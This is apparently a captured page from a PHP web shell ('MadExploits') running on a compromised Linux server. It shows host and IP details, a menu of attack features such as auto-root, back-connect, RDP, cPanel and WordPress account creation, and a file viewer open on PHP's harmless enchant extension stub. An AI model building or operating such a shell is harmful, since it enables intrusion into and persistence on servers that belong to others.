Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.216.71.122
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
enchant /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
44
B
-rw-r--r--
config.m4
1.22
KB
-rw-r--r--
config.w32
988
B
-rw-r--r--
enchant.c
20.1
KB
-rw-r--r--
enchant.stub.php
2.55
KB
-rw-r--r--
enchant_arginfo.h
7.49
KB
-rw-r--r--
php_enchant.h
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enchant.stub.php
<?php /** @generate-class-entries */ /** * @strict-properties * @not-serializable */ final class EnchantBroker { } /** * @strict-properties * @not-serializable */ final class EnchantDictionary { } function enchant_broker_init(): EnchantBroker|false {} /** @deprecated */ function enchant_broker_free(EnchantBroker $broker): bool {} function enchant_broker_get_error(EnchantBroker $broker): string|false {} /** @deprecated */ function enchant_broker_set_dict_path(EnchantBroker $broker, int $type, string $path): bool {} /** @deprecated */ function enchant_broker_get_dict_path(EnchantBroker $broker, int $type): string|false {} /** * @return array<int, array> * @refcount 1 */ function enchant_broker_list_dicts(EnchantBroker $broker): array {} function enchant_broker_request_dict(EnchantBroker $broker, string $tag): EnchantDictionary|false {} function enchant_broker_request_pwl_dict(EnchantBroker $broker, string $filename): EnchantDictionary|false {} /** @deprecated */ function enchant_broker_free_dict(EnchantDictionary $dictionary): bool {} function enchant_broker_dict_exists(EnchantBroker $broker, string $tag): bool {} function enchant_broker_set_ordering(EnchantBroker $broker, string $tag, string $ordering): bool {} /** * @return array<int, array> * @refcount 1 */ function enchant_broker_describe(EnchantBroker $broker): array {} /** @param array $suggestions */ function enchant_dict_quick_check(EnchantDictionary $dictionary, string $word, &$suggestions = null): bool {} function enchant_dict_check(EnchantDictionary $dictionary, string $word): bool {} /** * @return array<int, string> * @refcount 1 */ function enchant_dict_suggest(EnchantDictionary $dictionary, string $word): array {} function enchant_dict_add(EnchantDictionary $dictionary, string $word): void {} /** * @alias enchant_dict_add * @deprecated */ function enchant_dict_add_to_personal(EnchantDictionary $dictionary, string $word): void {} function enchant_dict_add_to_session(EnchantDictionary $dictionary, string $word): void {} function enchant_dict_is_added(EnchantDictionary $dictionary, string $word): bool {} /** * @alias enchant_dict_is_added * @deprecated */ function enchant_dict_is_in_session(EnchantDictionary $dictionary, string $word): bool {} function enchant_dict_store_replacement(EnchantDictionary $dictionary, string $misspelled, string $correct): void {} function enchant_dict_get_error(EnchantDictionary $dictionary): string|false {} /** * @return array<string, string> * @refcount 1 */ function enchant_dict_describe(EnchantDictionary $dictionary): array {}
Close